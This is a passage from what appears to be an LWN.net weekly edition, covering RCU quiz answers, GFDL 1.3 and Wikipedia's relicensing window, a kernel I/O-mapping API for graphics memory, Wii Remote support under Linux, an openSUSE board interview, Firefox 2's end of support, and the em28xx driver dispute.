which will cause an RCU callback to appear on the corresponding CPU,
which will force that CPU out of dyntick-idle mode, which will in turn
permit the current RCU grace period to come to an end.

Back to Quick Quiz 9.
Quick Quiz 10:
Given that force_quiescent_state() is a two-phase state
machine, don't we have double the scheduling latency due to scanning
all the CPUs?

Answer:
Ah, but the two phases will not execute back-to-back on the same CPU.
Therefore, the scheduling-latency hit of the two-phase algorithm is no
different than that of a single-phase algorithm.
If the scheduling latency becomes a problem, one approach would be to
recode the state machine to scan the CPUs incrementally.
But first show me a problem in the real world, then
I will consider fixing it!

Back to Quick Quiz 10.
Quick Quiz 11:
But the other reason to hold -&gt;onofflock is to prevent
multiple concurrent online/offline operations, right?

Answer:
Actually, no!
The CPU-hotplug code's synchronization design prevents multiple
concurrent CPU online/offline operations, so only one CPU online/offline
operation can be executing at any given time.
Therefore, the only purpose of -&gt;onofflock is to prevent a CPU
online or offline operation from running concurrently with grace-period
initialization.

Back to Quick Quiz 11.
Quick Quiz 12:
Given all these acquisitions of the global -&gt;onofflock,
won't there
be horrible lock contention when running with thousands of CPUs?

Answer:
Actually, there can be only three acquisitions of this lock per grace
period, and each grace period lasts many milliseconds.
One of the acquisitions is by the CPU initializing for the current
grace period, and the other two onlining and offlining some CPU.
These latter two cannot run concurrently due to the CPU-hotplug
locking, so at most two CPUs can be contending for this lock at any
given time.

Lock contention on -&gt;onofflock should therefore
be no problem, even on systems with thousands of CPUs.

Back to Quick Quiz 12.

		GFDL 1.3: Wikipedia's exit permit


Wikipedia is one of the preeminent
examples of what can be done in an open setting; it has, over the years,
accumulated millions of articles - many of them excellent - in a large
number of languages.  Wikipedia also has a bit of a licensing problem,
but it would appear that recent events, including the release of a
new license by the Free Software Foundation, offers a way out.


Wikipedia is licensed under the GNU Free Documentation License (GFDL).  The
GFDL has been covered here a number of times; it is, to put it mildly, a
controversial document.  Its anti-DRM provisions are sufficiently broad
that, by some peoples' interpretation, a simple "chmod -r" on
a GFDL-licensed file is a violation.  But the biggest complaint has to do
with the GFDL's notion of "invariant sections."  These sections must be
propagated unchanged with any copy (or derived work) of the original
document.  The GFDL itself must also be included with any copies.  So a
one-page excerpt from the GNU Emacs manual, for example, must be
accompanied by several dozen pages of material, including the original GNU
Manifesto.

So the GFDL has come to be seen by many as more of a tool for the
propagation of FSF propaganda than a license for truly free documentation.  Much of the
community avoids this license; some groups, such as the Debian Project, see
it as non-free.  Many projects which still do use the GFDL make a clear
point of avoiding (or disallowing outright) the use of cover texts,
invariant sections, and other GFDL features.  Some projects have dropped
the GFDL; in many cases, they have moved to the Creative Commons
attribution-sharealike license which retains the copyleft provisions of the
GFDL without most of the unwanted baggage.


Members of the Wikipedia project have wanted to move away from the GFDL for
some time.  They have a problem, though: like the Linux kernel, Wikipedia
does not require copyright assignments from its contributors.  So any
relicensing of Wikipedia content would require the permission of all the
contributors.  For a project on the scale of Wikipedia, the chances of
simply finding all of the contributors - much less getting them to
agree on a license change - are about zero.  So Wikipedia, it seems, is
stuck with its current license.


There is one exception, though.  The Wikipedia
copyright policy, under which contributions are accepted, reads like
this:


	Permission is granted to copy, distribute and/or modify this
	document under the terms of the GNU Free Documentation License,
	Version 1.2 or any later version published by the Free Software
	Foundation; with no Invariant Sections, with no Front-Cover Texts,
	and with no Back-Cover Texts.


The presence of the "or any later version" language allows Wikipedia
content to be distributed under the terms of later versions of the GFDL
with no need to seek permission from individual contributors.
Surprisingly, the Wikimedia Foundation has managed to get the Free Software
Foundation to cooperate in the use of the "or any later version" permission
to carry out an interesting legal hack.

On November 3, the FSF and the Wikimedia Foundation jointly announced the release of
version 1.3 of the GFDL.  This announcement came as a surprise to
many, who had no idea that a new GFDL 1.x release was in the works.  This
update does not address any of the well-known complaints against the GFDL.
Instead, it added a new section:


	An MMC [Massive Multiauthor Collaboration Site] is "eligible for
	relicensing" if it is licensed under this License, and if all works
	that were first published under this License somewhere other than
	this MMC, and subsequently incorporated in whole or in part into
	the MMC, (1) had no cover texts or invariant sections, and (2) were
	thus incorporated prior to November 1, 2008.
	
	The operator of an MMC Site may republish an MMC contained in the
	site under CC-BY-SA on the same site at any time before August 1,
	2009, provided the MMC is eligible for relicensing.


In other words, GFDL-licensed sites like Wikipedia have a special,
nine-month window in which they can relicense their content to the Creative
Commons attribution-sharealike license.  This works because (1) moving
to version 1.3 of the license is allowed under the "or any later
version" terms, and (2) relicensing to CC-BY-SA is allowed by
GFDL 1.3.

Legal codes, like other kinds of code, have a certain tendency to pick up
cruft as they are patched over time.  In this case, the FSF has added a
special, time-limited hack which lets Wikipedia make a graceful exit from
the GFDL license regime.  This move is surprising to many, who would not
have guessed that the FSF would go for it.  Lawrence Lessig, who calls the
change "enormously important," expresses
it this way:


	Richard Stallman deserves enormous credit for enabling this change
	to occur. There were some who said RMS would never permit Wikipedia
	to be relicensed, as it is one of the crown jewels in his movement
	for freedom. And so it is: like the GNU/Linux operation system,
	which his movement made possible, Wikipedia was made possible by
	the architecture of freedom the FDL enabled. One could well
	understand a lesser man finding any number of excuses for blocking
	the change.


For whatever reason, Stallman and the FSF chose to go along with this
change, though not before adding some safeguards.  The November 1
cutoff date (which precedes the GFDL 1.3 announcement) is there to
prevent troublemakers from posting FSF manuals to Wikipedia in their
entirety, and, thus, relicensing them.

Now that Wikipedia has its escape clause, it needs to decide how to
respond.  The plan would appear to be
this:


	Later this month, we will post a re-licensing proposal for all
	Wikimedia wikis which are currently licensed under the GFDL. It
	will be collaboratively developed on meta.wiki and I will announce
	it here.  This re-licensing proposal will include a simplified
	dual-licensing proposition, under which content will continue to be
	indefinitely available under GFDL, except for articles which
	include CC-BY-SA-only additions from external sources. (The terms
	of service, under this proposal, will be modified to require
	dual-licensing permission for any new changes.)


This proposal will be followed by a "community-wide referendum," with a
majority vote deciding whether the new policy will be adopted or not.
Expect some interesting discussions over the next month.

This series of events highlights a couple of important points to keep in
mind when considering copyright and licensing for a project.  There is a
certain simplicity and egalitarianism inherent in allowing contributors to
retain their copyrights.  But it does also limit a project's ability to
recover from a suboptimal license choice later on.  Licensing inflexibility
can be a good thing or a bad thing, depending on your point of view, but it
is certainly something which could be kept in mind.

The other thing to be aware of is just how much power the "or any later
version" text puts into the hands of the FSF.  The license promises that
later versions will be "similar in spirit," but the GPLv3 debate made it
clear that similarity of spirit is in the eye of the beholder.  It is not
immediately obvious that allowing text to be relicensed (to a license
controlled by a completely different organization) is in the "spirit" of
the original GFDL.  Your editor suspects that most contributors will be
willing to accept this change, but there may be some who feel that their
trust was abused.

Finally, it's worth noting that "any later version" includes
GFDL 2.0.  The discussion draft of
this major license upgrade has been available for comments for a full two
years now.  The FSF has not said anything about when it plans to move
forward with the new license, but it seems clear that anybody wanting to
comment on this draft would be well advised to do so soon.

		Large I/O memory in small address spaces


In the good old days, video graphics drivers ran in user space and the
kernel had little to do with video memory.  More recently, graphics
developers have decisively voted for change and, in the process, moved
video memory management into the kernel.  So now the kernel must often
manipulate video memory directly.  And that, as it turns out, is harder
than one might expect - at least, on 32-bit machines if the user actually
cares about reasonable performance.

The problem is that 32-bit machines have a mere 4GB of virtual address
space.  Linux (usually) splits that space in two; the bottom 3GB are given
to user space, while the kernel itself occupies the top 1GB.  Splitting the
space in this way yields an important advantage: there is no need to adjust
the memory management configuration on transitions between kernel and user
space, which speeds things up considerably.  The down side is that the
kernel has to fit in the remaining gigabyte of memory.  That would not seem
like much of a problem, even with contemporary kernels, but remember one
thing: the kernel needs to map physical memory into its address space
before it can do anything with it.  So the amount of virtual address space
given to the kernel limits the amount of physical memory it can manipulate
directly.

One other thing that must fit into the kernel's address space is the
vmalloc() area - a range of addresses which can be assigned on the
fly to create needed mappings in the kernel.  When a virtually-contiguous
range of memory is allocated with vmalloc(), it is mapped in this
range.  Another user of this address space is ioremap(), which
makes a range of I/O memory available to the kernel.

Device drivers typically need access to I/O memory, so they use
ioremap() to map it into the kernel's address space.  Graphics
adapters are a little different, though, in that they have large I/O
memory regions: the entirety of video memory.  Contemporary graphics
adapters can carry a lot of video memory, to the point that mapping it with
ioremap() would require far too much address space, if, indeed, it
fits in there at all.  So a straight ioremap() is not feasible;
life was much easier in the old days when this I/O memory was mapped into
user space instead.

The Intel i915 developers, who are the farthest ahead when it comes to
kernel-based GPU memory management, ran into this problem first.  Their
initial solution was to map individual pages as needed with
ioremap() (or, strictly, ioremap_wc(), which turns on
write combining - see this article for more details),
and unmapping 
them afterward.  This solution works, but it's slow.  Among other things,
an ioremap() operation requires a cross-processor interrupt to be
sure that all CPUs know about the address space change.  It is a function
which was designed to be called infrequently, outside of
performance-critical code.  Making ioremap() calls a part of most
graphical operations is not the way to obtain a satisfactory first-person
shooter experience.

The real solution comes in
the form of a new mapping API developed by Keith Packard (and subsequently
tweaked by Ingo Molnar).  It draws heavily on the fact that Linux has had
to solve this kind of problem before.  Remember that the kernel (on 32-bit
systems) only has 1GB of address space to work with; that is the maximum
amount of physical memory it can ever have directly mapped at any given
time.  Any physical memory above that amount is called "high memory"; it is
normally not mapped into the kernel's address space.  Access to that memory
requires an explicit mapping - using kmap() or
kmap_atomic() - first.  High memory is thus trickier to use, but
this trick has enabled 32-bit systems to support far more memory than was
once thought possible.


The new mapping API draws more than inspiration from the treatment of high
memory - it uses much of the same mechanism as well.  A driver which needs
to map a large I/O area sets up the mapping with a call to:


This function returns the struct io_mapping pointer, but it does
not actually map any of the I/O memory into the kernel's address space.
That must be done a page at a time with a call to one of:


Either function will return a kernel-space pointer which is mapped to the
page at the given offset.  
The atomic form is essentially a kmap_atomic() call - it uses the
KM_USER0 slot, which is a good thing for developers to know
about.  It is, by far, the faster of the two, but it requires that the
mapping be held by atomic code, and only one page at a time can be mapped
in this way.  Code which might sleep must use
io_mapping_map_wc(), which currently falls back to the old
ioremap_wc() implementation.


Mapped pages should be unmapped when no longer needed, of course:


There are some interesting aspects to this implementation.  One is that
struct io_mapping is never actually defined anywhere.  The code
need not remember anything except the base address, so the return value
from io_mapping_create_wc() is just the base pointer
which was passed in.  The other is that all of this structure is really
only needed on 32-bit systems; a 64-bit processor has no trouble finding
enough address space to map video memory.  So, on 64-bit systems,
io_mapping_create_wc() just maps the entire region with
ioremap_wc(); the individual page operations are no-ops.

Keith reports that, with this change,
Quake 3 (used for testing purposes only, of course) runs 18 times
faster.  The far more serious Dave Airlie tested with glxgears and got an increase from
85 frames/second to 380.  This is a big enough improvement that they would
like to see this code go into 2.6.28, which will contain the GEM memory
manager code.  Linus responds:


	I'm inclined to agree. Not that I think 380fps sounds very
	impressive (I get 850+ fps with _software_ rendering, for
	chissake), but because 85 fps is a joke, and clearly without this
	setup there's not even any point to try to do any other
	optimizations.


As a result, this code has been merged into the mainline and will appear in
2.6.28-rc4.

		Linux Connectivity for the Wii Remote


Linux has had support for numerous hand-held infrared remote control
devices for many years through the Linux Infra Red Controller
(LIRC) drivers.  There has
been recent work to
include LIRC in the kernel.
The Nintendo Wii Remote
is a more sophisticated remote control that was developed for the Wii
game platform, it is accessible through a collection of
Linux tools called CWiid.
Wikipedia describes the Wii Remote:


The Wii Remote, sometimes nicknamed "Wiimote", is the primary controller for Nintendo's Wii console. A main feature of the Wii Remote is its motion sensing capability, which allows the user to interact with and manipulate items on screen via movement and pointing through the use of accelerometer and optical sensor technology. Another feature is its expandability through the use of attachments.
The Wii Remote was announced at the Tokyo Game Show on September 16, 2005.


The Wiimote hardware capabilities
(photo)
include:

Two-way wireless Bluetooth connectivity to the host.
 A screen-mounted Sensor Bar with multiple IR light sources and a 5 meter range.
 A built-in IR camera with distance and rotation sensing capabilities.
 A three axis accelerometer for detecting hand motions.
 Six general purpose remote control pushbuttons labeled A, -, Home, +, 1 and 2.
 An up-down-left-right four-way pushbutton.
 A power switch.
 Four remote controlled LEDs.
 A built-in speaker for providing audio effects.
 A "rumble" device for producing vibrations.
 Built-in non volatile memory with space for user data.
 A hardware expansion port.
 Powered by two AA cells, can use rechargeable types.


CWiid was written by L. Donnie Smith and has been released under the
GPLv2. The project has been around since March, 2007 and is currently
at version 0.6.00.  The
libcwiid API
document explains the CWiid software interface.


There are currently at least twelve

programs using CWiid.
Some of the highlights include
control of DMX
lighting systems with
Wiimote Control,
3D display of chemical structures using the
Avogadro 
molecular editor, the
WiiOSC
control device for music programs and
a newly released 
prototype Wiimote Control for the
Ardour multi-track audio editor.
Although the Wiimote control is ideal for use in games, there
don't appear to be any such developments under Linux at this point.


One of the more interesting uses of the Wiimote includes
Head Tracking
for an immersive 3D experience, based on the work of
Johnny Chung Lee.
This approach to 3D visualization produces full-color
displays, unlike the the old-fashioned 3D movie technology that uses
glasses with red and green lenses.  Other 3D technologies require
expensive LCD shutters that tend to produce a lot of flicker.
The head tracking 3D technology would be well suited for use by the
physically disabled.


New Wiimote devices can be purchased for $40 or less.
Many of them exist on the used markets, thanks to the popularity of the
Wii platform.
If your favorite application could benefit from a two-way wireless
remote control device with a wide variety of features,
the Wiimote looks like a good choice.


		Interview with the openSUSE board


The openSUSE project recently welcomed
the first community elected board.  The previous board was appointed by
Novell.  The new board consists
of both Novell employees and non-Novell members of the community.  From the
Non-Novell side of the community Pascal Bleser and Bryen Yunashko were
elected, and from the Novell side Henne Vogelsang and Federico
Mena-Quintero were elected.  Novell appointed Michael Löffler as chairman
of the board.  We asked the new board a few questions and are pleased to
present their responses.

LWN: There was some discussion in the mailing lists prior to the
election about the definition of a member.  The current definition says:
"openSUSE Members" are specifically distinguished contributors who have
brought a continued and substantial contribution to the openSUSE project."

Do you agree with this definition?  What is your definition of "continued
and substantial"?


Pascal: We agree to that definition. The only potential issue with
it is the name "Members". We had a long discussion on our opensuse-project
mailing-list (that is open to everyone) about a proper name (and the
process too), but we didn't manage to come up with something less
ambiguous. Fedora's "Ambassador" title wouldn't be too bad, but actually
even more confusing as it is not the same role.  Unfortunately there is
no red line we can cross between "non substantial" and "substantial",
which is why the Board discusses and votes on each membership request.
Typically, membership is granted to individuals who have been
contributing to the community since more than half a year, in domains
such as packaging, translating, authoring content on the Wiki, hacking,
helping out by answering questions or administrating mailing-lists, our
forum, or on IRC, etc...  This is by no means an exhaustive list. We are
looking for verifiable contributions though, and we will discuss how to
proceed for granting Member status in the future, as the current process
doesn't scale that well. Several other options were discussed on our
opensuse-project mailing-list when we initiated the idea.


Bryen: This will always be a continuously evolved definition as we
identify people who contribute to the project as a whole, or in part, in
new ways we might not have thought of previously. Myself, I became a
member for my advocacy for a11y (accessibility through computing) and
encouraging others to think about the needs of people with accessibility
issues. I talked about it, I provided relevant information and I
participated regularly in openSUSE meetings. I see "continued and
substantial contribution" as someone who opens doors to making openSUSE
a more relevant platform for users.


LWN: Does Novell adequately support openSUSE?  Should Novell do more
to support the project?


Henne: Novell is investing a lot in openSUSE. Nearly the whole
technical infrastructure of the project is taken care of by Novell.  Novell
is also putting a lot of manpower and money into the project. But of course
we could always use more, the project is unsatisfiable in that regard. So
is Novell adequately supporting openSUSE?  Yes. Could Novell do more?
Definitely. Should Novell do more: Yes please.


Bryen: One of the things that attracted me to the openSUSE Community
was the active participation of Novell developers within the project.  They
continue to make themselves accessible and over time, they have given the
reins to other people from the community and empowering us all to do more
for the project. While I think Novell could stand to do a bit more
promoting of openSUSE to the general public, I think they've done a fine
job with Community Manager Joe Brockmeier.  In many ways, I think it is
premature to determine whether Novell *needs* to do more. It's only been a
week since the polls closed for our new Board and we've had a good outcome
of voter turnout at 75%.  This makes it the first time that our Board has a
community-backed mandate and a strong one at that. So it isn't a question
of whether they've done enough thus far, but more a question of what more
will they do now that Novell sees how strongly vested Community members are
in the project as stakeholder.


Pascal: But this doesn't mean it's one-way. The non-Novell
contributors in the community also do a lot, most of them during their free
time, as in almost any FOSS project. The community is very important to
Novell, and I believe that the relationship should be seen as being equal
partners.


Michael: Could Novell do more? Of course as everybody could do more.
But would it make sense? I doubt it. Rather than having even more support
by Novell I'd love to see more sponsors stepping up to base the openSUSE
project on broader shoulders and loose the dependency on one sponsor.


LWN: Does Novell exert too much control over the project?  Where are
the areas where Novell could allow more community control?


Bryen: The only time I've ever really seen any resistance from
Novell is when they are unable to provide adequate manpower and support for
a particular feature or request. But beyond that, there seems to be great
transparency by the teams within openSUSE. If we were to go down the
path towards greater community control, it is more about whether there
is adequate manpower within the community to provide the support it
needs. I don't think Novell is resistant to that at this time, but
ultimately, it is about increasing membership where we can all work
together seamlessly.


Pascal: I don't believe that Novell exerts too much control over the
project. It's rather the opposite. It is important to understand that this
is an evolving process, where we started from (more or less) everything
closed except for a few when S.u.S.E. GmbH was acquired by Novell to the
point where Novell pushed for opening up many things around openSUSE when
it launched opensuse.org three years ago.  More and more domains and teams
have opened up towards the community, and the community has grown with it.
Right now, we're rather in a position where Novell is actually looking for
more contributors from the community, with existing open processes (open
discussions on our mailing-lists, source code available in public
Subversion repositories, etc...).

There are still a few areas where we're still at the beginning of
opening up (actually rather at the point of starting to think about ways
to do that properly), such as having non-Novell employees co-maintain
core distribution packages or the openSUSE reference guide.
As said, it's in flux, and certain things take time, but Novell
definitely hasn't been standing in the way, quite the contrary.
And while Novell ultimately has the most resources in certain or even
most areas of the project, especially in building the distribution and
providing security maintenance during the openSUSE release lifetime,
there is always room for discussion.

One notable example was the thread about whether KDE 3 should be removed
from openSUSE 11.1, as KDE 4 is where almost all KDE developers put
their efforts in. At first, Novell's product management position was to
drop KDE 3 because it would mean supporting it for 2 years. But the
discussion lead to a compromise, as many believe that KDE 4 wasn't quite
ready enough. In the end, openSUSE 11.1 will still have KDE 3, but KDE 3
will be dropped in 11.2. The KDE3 maintenance during the lifetime of
openSUSE 11.1 will be taken care of by Novell employees.  So, again, while
Novell commits most of the resources, the opinion of the community is
important to them, for obvious reasons.


Michael: With regards to more community control I think we (the
project) need to define clearer rules how to contribute and I'd love to
see co-maintainership for more and more packages, long term even core
packages.


LWN: Is the current board, with 5 members (2 Novell + 3 non), a good
size and does it achieve the right balance of corporate vs. community?


Pascal: I believe that 5 individuals form a good team size to
effectively get things done. The background of each member also happens
to strike an interesting, diverse and good balance of opinions and
influences both from within Novell employees as well as from the
non-Novell employees in the community. This is clearly very healthy and
can only lead to better representation of the community's opinions.

I can also imagine that at some point, that differentiation between Novell
employee and non-Novell employee Board position shall be removed. Remember
that it is our first elected Board. We take some decision and define some
processes because we believe that they offer a good balance. Actually, the
idea behind that separation was to make sure that there were two seats
occupied by non-Novell employees (and not less).


Bryen: What is important is that we ensure adequate representation
of the community and that the community is heard.  As the Community grows,
we might have to revisit the size of the Board and consider adding adequate
representation.


Henne: I also have the feeling that on the topic of Novell and
openSUSE there is a big misconception. There really is no versus in that
relationship. In fact the openSUSE community consist of people that support
the openSUSE project and its goals. Some of those people are employed by
Novell, some of them are not. So its not "corporate vs. community" but
rather "community equals corporate and non-corporate".  Also, the openSUSE
Board isn't the dictator of this project. The project consists of many many
different areas where people lead and make decisions on a daily basis. Some
of those people are employed by Novell, some of them are not. So to execute
control over this Board does not give you control over the openSUSE
project. Just over the openSUSE Board.

We understand that this is a controversial topic. But you shouldn't get
too theoretical while reflecting upon it. It is very tempting but this
is a total non-issue in reality. We are not trying to find the best
theoretical possibility to govern a project. We are hackers that try to
get things done.


LWN: In the openSUSE election members were able to name another
contributor (non-member) to be a voter. Would you like to see this continue
in future elections?  Do you know if there were many non-members who voted
in this election?


Henne: I think we all agree with our election officials that his was
a special rule for the first election (see Board Election page.  So this
will not continue for future elections. There were 25 non-members
eligible. How many of them voted is not public.


Bryen: The non-member voters really represented a small fraction of
the electors as a whole. 25 out of 237. There were certainly mixed feelings
across the board about the idea of franchising votes, but the idea was
noble by the election committee to find ways to further identify potential
members and increase membership. Since one of the Board's mandates is to
grow the Community, I don't see the need for franchising votes in upcoming
elections. By the time the next election comes along, we should have done
significant work in reaching out to more new potential members.


LWN: How do regular users get more involved?  How can they
contribute to both the technical work and the decision making?


Henne: As with any other open source project: Be there or be square!
Seriously, its as simple as showing up and participate. That's one of the
beauty's of free and open source projects.  To contribute to our user
support just subscribe to one of our mailing lists, join one of our IRC
channels or login to our forum and help people as best as you can; as
described here.

To contribute to our documentation go and help organizing and authoring in
our Wiki.  To help to translate the
openSUSE distribution into your language join one of our various translation teams and translate
strings to your native language.

To contribute to the distribution use the openSUSE Build service.  And those
are just the four main entrances into our project. You can have it as
specialized as helping openSUSE HAM users to transmit via radio, spinning
your own version of openSUSE for educational use or create artwork to be
included in the distribution.  The same holds true for decision making.
All of the different areas make their own decisions. So to influence
decisions you go there, participate and voice your opinion.

Decisions that concern the overall project are always discussed at the
opensuse-project mailing list or are a topic in the bi-weekly
opensuse-project meeting. So you just go there and do the same.
It is really as simple as that.


Bryen: I think my personal story is the best example of all. Of all
the members on the Board, I'm probably the least technical. I'm more of an
active user than anything else.  How did I get involved? I attended
meetings on IRC, advocated a11y, got involved in education by forming the
openSUSE Helping Hands project and as co-editor of the
openSUSE-Tutorials.com web
site.

Users can become members through advocacy, promoting openSUSE regularly
at local events, getting online and providing support to new users in
IRC and the forums. It's really not that difficult to become a member
and you don't have to be a technical genius to become a member.


Pascal: I'd like to add that while a number of things are in place,
we clearly have to work even further on lowering the barriers for people
who are willing to contribute. Even better tools, better documentation,
even more translations. As always, and as for any other FOSS project, there
is always room for improvement.


Michael: I can just support Pascal's opinion that it would be
beneficial for us to lower barriers and provide a clearer description in
what and how everybody can contribute and present our existing tools
better.  Especially implement some cross-functionality like better
integration of our Bugzilla and the openSUSE build service for instance.


LWN: Do you see areas of collaboration with other distributions
either currently or in the future?


Henne: Collaboration is our foundation. We would cease to exist if
we wouldn't collaborate with everyone else in the free an open source
community.  Among them are, of course, also other distributions.  Whether
openSUSE project members hack with members of the Debian or Slackware
projects on some upstream project like the Linux kernel, or that we
coordinate when it comes to security issues with everyone else on
vendor-sec, or that we try to consolidate tools we use like we do with
Fedora on smolts.org.  There are of course also the big collaboration
projects we support like the Linux Standard Base or freedesktop.org.  So we
are collaborating heavily with other distributions already and we will
continue to do so in the future.


Bryen: Generally speaking, collaboration is an integrated feature of
open source, so yes, collaboration exists across the board between openSUSE
and other distributions.


Pascal: I'd like to see that going even further. As one of the
organizers of the FOSDEM conference, one of our primary goals there is
to foster cross-pollination between projects with similar goals and
domains. While difference and choice are some of the key features of
FOSS (yes, I believe that having many distributions is very healthy),
there are situations where working together on a few things makes sense.
There isn't always a point in reinventing the wheel. Sharing development
efforts and commoditizing tools for contributors is clearly something
I'd like to see happening more often.

While openSUSE is definitely a brilliant distribution in many regards
and while we have a healthy community that consists of great people, we
still have a lot to do, and so do the other distribution projects.
They're not less good nor less deserving, we all have our strengths and
weaknesses, so we should work together to make Linux and FOSS a better
experience to everyone. If you're feeling at home with another
distribution, great, contribute there! And if you think you'd like to
contribute to our distribution or to our community, you are definitely
welcome here too. And if you believe there are domains where we can work
together, please get in touch with us at board -AT- opensuse.org.


Editor's note: We would like to thank the openSUSE Board for taking the
time to answer our questions.  Readers may notice that not all board
members have answered every question.  This was their choice and not due to
any censorship on our part.

		The end of the road for Firefox 2


By some accounts,
the Firefox browser is now responsible for a full 20% of web traffic.  As the
number of Firefox users grows, so does the need for top-quality support;
20% makes for a large number of potential attack points.  So it is
interesting to note that Mozilla is now planning to end Firefox 2 support in the
near future, perhaps before the end of the year.  This change could leave a
lot of users - and not just Firefox users - in a difficult position.

One obvious question to ask would be: have most Firefox users moved on to
Firefox 3?  Apparently, about two out of three users have made the
change, but millions of users have yet to move away from the older
browser.  The Mozilla project would like to get as many of those users to
switch before ending support; that, in turn, requires looking at why they
haven't yet upgraded.  There seem to be a few prominent reasons beyond
sheer inertia:


 Some users have systems which are not supported by Firefox 3.
     Many of these, it seems, are running old versions of Windows - 9x or
     NT4.  In these cases, the operating system itself has long since
     ceased to receive support, so it's not entirely clear that continuing
     to support the browser does a whole lot of good.

 Others are dependent on extensions which have not been ported to
     Firefox 3.  While most actively-developed extensions 
     were ported some time ago, it appears that there are quite a few extensions
     which, while still having significant numbers of users, have been
     abandoned by their developers.  Zack Weinberg has suggested that the project could make an
     active effort to find new maintainers for those extensions, or even
     fix a few of them itself.

 The Firefox 3 experience is not problem-free for all users; there have
     been some complaints about printing on some systems, for example.
     Finding - and fixing - the remaining blockers is clearly an important
     thing for the Firefox developers to do.


Somehow, ways will probably be found to coax most of these users into
moving forward to a newer browser.  Beyond doubt, though, some will be left
behind, and some of those may learn the hard way what "unsupported" really means.
But that will be true no matter how long Firefox 2 is supported;
there's never a way to get all users to upgrade.  Firefox is not different
from any other application in this regard, with the sole exception that its
user base is larger than most.

There is another important aspect to this story, though: this decision will
affect users well beyond those who use Firefox.  The end of Firefox 2
support will also bring an end to support for the Gecko 1.8.1
platform.  And this version of Gecko is used by several applications beyond
Firefox, including Camino, SeaMonkey, Sunbird, Miro, Instantbird, and Thunderbird.
All of these platforms currently use Gecko - the soon-to-be-discontinued
version of Gecko - for HTML rendering.

There is a fair amount of concern about Thunderbird in particular.  This mail client was
recently kicked out of the Mozilla nest to fend for itself.  Thunderbird
developers are working toward a Thunderbird 3 release (the third
alpha release came out in mid-October) which will use a newer version
of Gecko.  But the 3.0 release is still several months away - some months
after the end of Gecko 1.8.1 support.  Naturally enough, the Thunderbird
developers worry that their current users will be running in an unsupported
mode; that does not strike them as the best start for their
newly-independent project.

The word from the Mozilla Foundation seems to be that the Gecko platform
will continue to be supported, in some minimal fashion, for a while yet.
According to Samuel Sidler:


	The triage and release team that currently works on Firefox and
	Thunderbird 2.0.0.x releases will continue to triage requests for
	Thunderbird 2.0.0.x and maintain its releases until six months
	after the release of Thunderbird 3.

	Note that this will mean that browser-specific security and
	stability bugs will likely be ignored/minused. We'll only be
	considering bugs that affect Thunderbird 2.0.0.x.


So it seems that Thunderbird should be covered - as long as the people who
decide whether bugs are "browser-specific" do their job properly.  But
experience has shown many times that it can be hard to understand the full
implications of a given bug.  It would not be all that surprising for one
or more "browser-specific" bugs to turn out to be fully exploitable in
Thunderbird.

Beyond that, though, applications like SeaMonkey and Camino are
browsers.  Developers from those projects are, needless to say, concerned
that their needs are not being taken into account.  They are not attracted
by the idea of shipping a browser based on a platform where
browser-specific bugs are being ignored.  Mozilla developers have tried to
reassure these groups that the situation is not as bad as it seems, but how
things will work for them is far from clear.  The real answer was, perhaps,
suggested by Samuel:


	The community can take over this branch, just as has been done for
	Gecko 1.8.0 (currently managed by Linux vendors)


In other words, Mozilla would like to outsource the maintenance of this
code to the community, and to distributors in particular.  The good news is
that this is free software, so this kind of extended maintenance is
possible as long as the interest is there to do it.  Gecko is a non-trivial
body of software to maintain, but it should be possible for the various
interested projects, along with distributors still shipping this code,
to pool their effort and get the job done.  In their spare time, perhaps,
they can give some thought to how they might avoid getting caught in the
same situation when Firefox 3 reaches the end of its supported life.

		The sad story of the em28xx driver


Over the last year or two, the kernel development process has been changed
in a deliberate attempt to make the addition of new drivers easier.  It has
become clear that out-of-tree drivers often do not get any better until
they are merged; meanwhile, users want those drivers and distributors are
shipping them.  So it would seem that everybody's interests are served by
getting those drivers into the mainline tree.  Experience with drivers
merged under this policy has generally been positive; once those drivers
head for the mainline, they get more attention and tend to improve
quickly.


Given that, one might well wonder why Markus Rechberger's recently
submitted "empia" driver series is encountering so much resistance.  This
driver works with a number of video acquisition devices based on Empia
chips; many of those are not supported by the kernel now.  As an Empia
Technology employee, Markus has access to the relevant data sheets and is,
thus, well placed to write a fully-functional driver.  There are users who
will attest that the drivers work, and that Markus provides good support
for them.  But, as things stand now, it would appear that this driver is
not headed for the mainline.


What we have here is a classic story of an impedance mismatch between a
developer and the development community.  In the process, this long story
has helped to give the Video4Linux development community a bit of a
reputation as a dysfunctional family - a perception which
those developers are only now beginning to overcome.  The sad truth would seem
to be that, while working with the community is something that a couple
thousand developers do with little trouble every year, there will always be
a few who have difficulties.

A quick review of some of the history is in order here.
Markus was one of the authors of the original em28xx driver, first merged
for the 2.6.15 kernel.  His efforts to enhance that driver quickly ran into
trouble, though, when he tried to make substantial changes to the low-level
tuner interface - changes which affected a number of other drivers.  These
changes were not popular in the Video4Linux community, and there were fears
that they could break unrelated drivers.  So this code was not merged.

In response to this rejection, Markus claimed
ownership of the em28xx driver and asked that it be removed from the
mainline kernel.  He then continued development of the code, hosting it on
his own server.
There was even a period where the code was relicensed to the MPL, apparently as
part of an attempt to prevent it from being
taken into the mainline.  


Eventually, Markus came back with a new approach which moved much
of the tuner code into user space.  That solution, too, failed to pass
review; nobody else could really see much advantage in moving that much
driver code out of the kernel.  The fact that Markus clearly intended to
have some of that code appear in the form of binary-only blobs did not help
his case.  So the user-space approach, like its predecessor, was not
merged.


While Markus was working on his own version of the code, others were
putting patches into the mainline em28xx driver.  At times, Markus tried to
block those changes.  The tone of the discussion is, perhaps, best seen
from this note sent to Video4Linux
maintainer Mauro Carvalho Chehab:


	Best would be to replace you as a maintainer since you don't have
	any respect of others work either.  Companies should be aware that
	if they try to submit any code to you they will loose the authority
	over _their_ work.


Of course, losing "authority" over code is inherent in releasing that code
under a license like the GPL.  This attempt to exercise control over
freely-licensed code was slapped down by
Andrew Morton and others, but it left unpleasant memories behind.

Now Markus is back with a driver that, to all appearances, duplicates the
functionality of a driver which is already in the mainline kernel.  It is
not hard to see this submission as an attempt to retake control of that
driver and, perhaps, restart the discussions from past years.  So it is not
entirely surprising that this driver has not been received with a great
deal of enthusiasm.  In short, Markus has been told to go away until he is
prepared to submit his work in the form of a series of small patches to the
in-tree em28xx driver.


The advantages of improving the current driver, rather than duplicating
some of its functionality 
in a new code base, are clear.  It would avoid the confusion which can
come from having two drivers for the same hardware in the tree, and it
would minimize the risk of losing important fixes which have been applied
to the in-tree code.  This is, also, the way that kernel developers are
normally expected to do their work.
On the other hand, video developer Hans Verkuil reviewed the new driver and concluded:


	In my opinion it's pretty much hopeless trying to convert the
